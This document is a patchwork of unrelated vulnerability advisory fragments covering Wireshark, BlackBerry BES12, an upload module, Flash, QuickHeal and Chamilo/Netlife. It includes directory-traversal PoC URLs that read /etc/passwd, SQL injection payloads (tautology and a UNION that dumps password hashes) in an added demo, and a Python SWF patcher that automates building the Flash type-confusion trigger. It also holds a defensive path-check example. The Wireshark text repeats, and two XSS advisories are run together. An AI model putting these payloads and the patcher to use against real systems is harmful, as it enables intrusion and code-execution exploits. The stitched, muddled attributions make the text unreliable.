A heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master) by feeding a malformed file to tshark. ASAN reports a WRITE of size 1425 at 0x61b00001e95c (thread T0), an address located 0 bytes to the right of the 1500-byte region [0x61b00001e380,0x61b00001e95c) allocated by thread T0; the write therefore begins exactly at the end of the allocation and runs 1425 bytes past it.
An out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master) by feeding a malformed file to tshark. ASAN reports it as a global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198, and the process crashes.
Blackberry BES12 is an enterprise mobile management solution that includes a self-service web application for mobile users. This web application contains multiple vulnerabilities, including unauthenticated SQL injection and reflected cross-site scripting. Only limited access to an on-premises BES12 environment was available while these vulnerabilities were discovered, so their full impact on other parts of the BES12 solution, such as managed mobile devices, is unclear. The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL injection via the imageName parameter; this servlet is exposed at multiple paths and is used to fetch an image from the database. The Java servlet com.rim.mdm.ui.server.LoginServlet is vulnerable to reflected cross-site scripting via the error parameter.
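As an added illustration of the SQL injection class described above, the following Python (written for this page; it is not BES12 or ImageServlet code, and the schema, rows, payloads and function names are constructed for the demo) shows an image lookup that splices the imageName value into the query text, beside the parameterised form that the servlet should use:

```python
"""Added example for this page: SQL injection in an image-lookup handler.
Not BES12 or ImageServlet code; schema, rows and payloads are constructed here."""
import sqlite3


def build_db():
    """Constructed sample database: an images table plus an unrelated users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (name TEXT PRIMARY KEY, data BLOB)")
    conn.execute("CREATE TABLE users (username TEXT, pwhash TEXT)")
    conn.executemany("INSERT INTO images VALUES (?, ?)",
                     [("logo.png", b"PNG-logo"), ("banner.png", b"PNG-banner")])
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"))
    conn.commit()
    return conn


def fetch_image_vulnerable(conn, image_name):
    """Hypothetical vulnerable pattern: the untrusted imageName value is spliced
    into the SQL text, so a quote character in it rewrites the statement."""
    sql = "SELECT name, data FROM images WHERE name = '" + image_name + "'"
    return conn.execute(sql).fetchall()


def fetch_image_safe(conn, image_name):
    """Parameterised form: the value is bound as data and never parsed as SQL."""
    return conn.execute(
        "SELECT name, data FROM images WHERE name = ?", (image_name,)
    ).fetchall()


# Constructed payloads. The first turns the WHERE clause into a tautology and
# returns every image; the second uses UNION to read rows from a table the
# image handler was never meant to expose.
TAUTOLOGY = "x' OR '1'='1"
UNION_DUMP = "x' UNION SELECT username, pwhash FROM users WHERE '1'='1"


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, tautology:", fetch_image_vulnerable(db, TAUTOLOGY))
    print("vulnerable, union dump:", fetch_image_vulnerable(db, UNION_DUMP))
    print("safe, tautology:", fetch_image_safe(db, TAUTOLOGY))
    print("safe, union dump:", fetch_image_safe(db, UNION_DUMP))
```

Because the handler is unauthenticated, the UNION variant is the one to worry about: any table the application's database account can read is reachable through the imageName parameter.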
The vulnerability is an out-of-bounds read from static (global) memory in Wireshark, triggered by feeding a malformed file to tshark. The crash can be observed in an ASAN build of Wireshark (current git master).
The vulnerability is a classic buffer overflow. The 'Log filename (include path)' field, reached via [setup] - [new] - [Logging options] - [More], imposes no limit on the length of its input and does not check it. Entering a string of 1500 'A' characters ('A'*1500) into the field and pressing OK, then OK again, causes a crash.
A local file include web vulnerability allows remote attackers to include local files or system-specific paths through unauthorized requests and thereby compromise the mobile web application. The vulnerability is located in the `filename` value of the `./toolkit/upload` module. A persistent input validation web vulnerability additionally allows remote attackers to inject their own malicious script code into the application side of the vulnerable module; it is located in the `name` value of the same `./toolkit/upload` module.
Based on a code review of the product, certain parameters are not validated at all, which allows an attacker to read arbitrary file contents via directory traversal. PoC 1: https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd or view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd PoC 2 [login authentication required]: https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts
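An added example (not code from either product above) of the server-side check that is missing both from the `filename` value of the `./toolkit/upload` module and from the `report_filename` / `config_file` parameters: resolve the requested name under the directory the handler is meant to serve and refuse anything that escapes it. The base directory, function names and the clean sample name are assumptions for the demo; the traversal strings are the ones from the PoC URLs above.

```python
"""Added example for this page: the directory-traversal check missing from the
handlers above. Not code from either product; paths and names are assumptions."""
import os
from urllib.parse import unquote

REPORT_DIR = "/srv/reports"  # assumed location of the files the handler may serve


def safe_report_path(base_dir, requested):
    """Return the real filesystem path for `requested` if, and only if, it
    stays inside base_dir. Return None for anything that must be refused."""
    if not requested or "\x00" in requested or os.path.isabs(requested):
        # Absolute names (/etc/passwd) and NUL-truncation tricks are rejected outright.
        return None
    base = os.path.realpath(base_dir)
    # realpath normalises '..' segments and follows symlinks, so the prefix test
    # below runs on what the OS would actually open, not on the raw string.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def looks_like_traversal(requested):
    """Cheap detection signal for logs or WAF rules: an absolute path, or a
    parent-directory segment in raw or single-URL-encoded form. The web server
    normally decodes the parameter before the handler sees it, so the
    filesystem check above is the real control; this is only for visibility."""
    decoded = unquote(requested)
    return (decoded.startswith("/")
            or ".." in decoded.split("/")
            or ".." in decoded.split("\\"))


# Constructed samples: the traversal strings are those from the PoC URLs above.
SAMPLES = [
    "q1/summary.csv",
    "/etc/passwd",
    "../../../../../../../../../../../../etc/passwd",
    "../../../../../../../../../../../../../../etc/hosts",
    "..%2F..%2Fetc%2Fpasswd",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:58} -> {safe_report_path(REPORT_DIR, s)!r}"
              f"  traversal={looks_like_traversal(s)}")
```

Note that the check is done after resolution rather than by stripping `..` from the string: string filtering leaves room for encodings and mixed separators, while comparing the resolved path against the resolved base directory decides on the path the OS will open.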
There is a type confusion vulnerability in the SimpleButton constructor. For optimization reasons Flash keeps an empty button object that it uses as a template when creating buttons. If that object is created by a SWF tag before the Button class creates it, and it is not of type Button, type confusion occurs. Reproducing the issue requires altering a SWF in a hex editor. To start, build button.fla, a swf with the code: var sb = new SimpleButton(); and a font attached. Decompress the swf with flasm -x button.swf, then replace all occurrences of the font ID (0x0001) in the three tags that use it with the ID of the empty button object (0xfff6). When the button is created, the font is type confused with a button.
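An added helper for the hex-editing step above (written for this page; not part of the original write-up and not Flash code): a small walker over the uncompressed SWF tag stream that rewrites the 16-bit font ID only inside the tags that actually carry it, rather than blindly replacing every `01 00` in the file. It assumes the font tags involved (DefineFont2/3, DefineFontAlignZones, DefineFontName) hold the ID as the first UI16 of their body; DefineText stores font references inside bit-packed TextRecords and would need a dedicated parser. The sample SWF is a stub constructed inline, not button.swf.

```python
"""Added helper for the hex-editing step above (not part of the original
write-up or of Flash): walk the uncompressed SWF tag stream and retarget the
16-bit font ID only inside the tags that carry it at the start of their body."""
import struct

# Tag codes whose body begins with the font/character ID as a UI16.
# Assumption for this example: DefineFont2 (48), DefineFont3 (75),
# DefineFontAlignZones (73) and DefineFontName (88). DefineText (11) keeps font
# references inside bit-packed TextRecords and is deliberately not handled here.
FONT_ID_AT_BODY_START = {48, 75, 73, 88}


def first_tag_offset(data):
    """Parse the FWS header and return the offset of the first tag."""
    if data[:3] != b"FWS":
        raise ValueError("only uncompressed (FWS) SWF is handled; run flasm -x first")
    nbits = data[8] >> 3                      # RECT Nbits lives in the top 5 bits
    rect_len = (5 + 4 * nbits + 7) // 8       # RECT is padded to a byte boundary
    return 8 + rect_len + 2 + 2               # + FrameRate (UI16) + FrameCount (UI16)


def iter_tags(data):
    """Yield (tag_code, body_offset, body_length) for every tag up to End."""
    pos = first_tag_offset(data)
    while pos + 2 <= len(data):
        code_and_len = struct.unpack_from("<H", data, pos)[0]
        code, length, hdr = code_and_len >> 6, code_and_len & 0x3F, 2
        if length == 0x3F:                    # long form: a UI32 length follows
            length = struct.unpack_from("<I", data, pos + 2)[0]
            hdr = 6
        yield code, pos + hdr, length
        if code == 0:                         # End tag
            break
        pos += hdr + length


def retarget_font_id(data, old_id, new_id, tag_codes=FONT_ID_AT_BODY_START):
    """Return (patched_bytes, codes_patched). Tag lengths are unchanged, so the
    header's FileLength field does not need updating."""
    buf = bytearray(data)
    hit = []
    for code, off, length in iter_tags(buf):
        if code in tag_codes and length >= 2 and struct.unpack_from("<H", buf, off)[0] == old_id:
            struct.pack_into("<H", buf, off, new_id)
            hit.append(code)
    return bytes(buf), hit


def changed_offsets(a, b):
    """Offsets at which two equal-length byte strings differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def _tag(code, body):
    return struct.pack("<H", (code << 6) | len(body)) + body   # short header (< 63 bytes)


def build_sample_swf(font_id=0x0001):
    """Constructed stub SWF (not button.swf): the font tags carry font_id, and
    the DoABC body and FrameCount also happen to contain the bytes 01 00."""
    fid = struct.pack("<H", font_id)
    tags = (_tag(75, fid + b"\x00\x00\x05Arial")        # DefineFont3 (truncated body)
            + _tag(73, fid + b"\x40")                    # DefineFontAlignZones
            + _tag(88, fid + b"Arial\x00\x00")           # DefineFontName
            + _tag(82, b"\x01\x00\x00\x00frame1\x00")    # DoABC: Flags=1, bytes 01 00 but no ID
            + _tag(1, b"") + _tag(0, b""))               # ShowFrame, End
    rect = bytes.fromhex("7800055f00000fa000")          # 550x400 px stage, Nbits=15
    swf = bytearray(b"FWS" + bytes([10]) + b"\0\0\0\0" + rect
                    + struct.pack("<HH", 0x1800, 1) + tags)  # 24 fps, 1 frame
    struct.pack_into("<I", swf, 4, len(swf))            # FileLength
    return bytes(swf)


if __name__ == "__main__":
    swf = build_sample_swf()
    for code, off, length in iter_tags(swf):
        print(f"tag {code:3d} at {off:#06x} len {length}")
    patched, hit = retarget_font_id(swf, 0x0001, 0xFFF6)
    print("patched tags:", hit, "bytes changed:", len(changed_offsets(swf, patched)))
    naive = swf.replace(b"\x01\x00", b"\xf6\xff")
    print("blind replace would change", len(changed_offsets(swf, naive)), "bytes")
```

On the stub the tag-aware patch touches exactly the three font tags (six bytes), while a blind replace of every `01 00` would also corrupt the FrameCount field and the DoABC flags; the same care applies when doing the edit by hand in a hex editor.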
A denial of service vulnerability exists in the QuickHeal webssx.sys driver due to improper validation of user-supplied input. An attacker can exploit it by sending a specially crafted IOCTL request to the driver, resulting in a denial of service condition.
A persistent cross-site scripting vulnerability has been discovered in the official Chamilo LMS web application. A GET cross-site scripting web vulnerability has been discovered in the official Netlife Photosuite Pro content management system. The vulnerability allows remote attackers to inject malicious script code on the client side of the vulnerable module. It is located in the `name` value of the `user` module; remote attackers are able to inject their own malicious script code into the vulnerable `name` value.